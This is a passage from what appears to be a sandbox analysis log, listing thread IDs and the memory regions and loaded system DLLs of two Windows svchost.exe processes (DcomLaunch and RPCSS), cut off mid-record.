os_tid = 0x280 Thread: id = 339 os_tid = 0x234 Thread: id = 340 os_tid = 0x220 Thread: id = 341 os_tid = 0x214 Thread: id = 481 os_tid = 0xd18 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xe002000" os_pid = "0x248" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006ee9" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 7636 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7637 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 7638 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7639 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7640 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7641 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7642 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 7643 start_va = 0x150000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7644 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 7645 start_va = 0x260000 end_va = 0x26cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 7646 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 7647 start_va = 0x370000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 7648 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 7649 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 7650 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7651 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 7652 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 7653 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 7654 start_va = 0x510000 end_va = 0x513fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpnpmgr.dll.mui" filename = "\\Windows\\System32\\en-US\\umpnpmgr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpnpmgr.dll.mui") Region: id = 7655 start_va = 0x6d0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 7656 start_va = 0x800000 end_va = 0xacefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7657 start_va = 0xad0000 end_va = 0xc57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 7658 start_va = 0xc60000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 7659 start_va = 0xdf0000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 7660 start_va = 0xe70000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 7661 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 7662 start_va = 0xfb0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 7663 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 7664 start_va = 0x1190000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 7665 start_va = 0x1230000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 7666 start_va = 0x12b0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 7667 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 7668 start_va = 0x1450000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 7669 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 7670 start_va = 0x16a0000 end_va = 0x171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 7671 start_va = 0x18b0000 end_va = 0x19affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 7672 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7673 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7674 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7675 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7676 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7677 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7678 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 7679 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 7680 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 7681 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 7682 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7683 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 7684 start_va = 0x7fef5430000 end_va = 0x7fef5461fff monitored = 0 entry_point = 0x7fef544ca90 region_type = mapped_file name = "wmidcprv.dll" filename = "\\Windows\\System32\\wbem\\WmiDcPrv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll") Region: id = 7685 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 7686 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7687 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 7688 start_va = 0x7fefca10000 end_va = 0x7fefca90fff monitored = 0 entry_point = 0x7fefca1cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 7689 start_va = 0x7fefcaa0000 end_va = 0x7fefcacbfff monitored = 0 entry_point = 0x7fefcaa1860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 7690 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 7691 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 7692 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 7693 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 7694 start_va = 0x7fefcb50000 end_va = 0x7fefcbb6fff monitored = 0 entry_point = 0x7fefcb5d320 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 7695 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 7696 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 7697 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7698 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7699 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7700 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7701 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7702 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7703 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7704 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7705 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 7706 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 7707 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7708 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 7709 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7710 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 7711 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7712 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7713 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7714 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7715 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7716 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7717 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7718 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7719 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7720 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7721 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7722 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7723 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7724 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7725 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 7726 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7727 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7728 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 7729 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 7730 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 7731 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 7732 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 7733 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7734 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7735 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7736 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7737 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 7738 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7739 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 342 os_tid = 0x7a4 Thread: id = 343 os_tid = 0xf24 Thread: id = 344 os_tid = 0x3f4 Thread: id = 345 os_tid = 0x298 Thread: id = 346 os_tid = 0x294 Thread: id = 347 os_tid = 0x278 Thread: id = 348 os_tid = 0x274 Thread: id = 349 os_tid = 0x270 Thread: id = 350 os_tid = 0x26c Thread: id = 351 os_tid = 0x260 Thread: id = 352 os_tid = 0x24c Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xd440000" os_pid = "0x28c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b4c4" [0xc000000f], "LOCAL" [0x7] Region: id = 6906 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6907 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 6908 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6909 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6910 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6911 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6912 start_va = 0x70000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6913 start_va = 0xf0000 end_va = 0xf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 6914 start_va = 0x100000 end_va = 0x100fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 6915 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 6916 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 6917 start_va = 0x130000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 6918 start_va = 0x230000 end_va = 0x296fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6919 start_va = 0x2a0000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6920 start_va = 0x340000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 6921 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 6922 start_va = 0x450000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 6923 start_va = 0x640000 end_va = 0x90efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6924 start_va = 0x960000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 6925 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 6926 start_va = 0xa80000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6927 start_va = 0xb80000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 6928 start_va = 0xc00000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 6929 start_va = 0xc80000 end_va = 0xe07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 6930 start_va = 0xe10000 end_va = 0xf90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 6931 start_va = 0x1110000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 6932 start_va = 0x1340000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 6933 start_va = 0x14b0000 end_va = 0x152ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 6934 start_va = 0x1530000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 6935 start_va = 0x1620000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 6936 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6937 start_va = 0x776e0000 end_va = 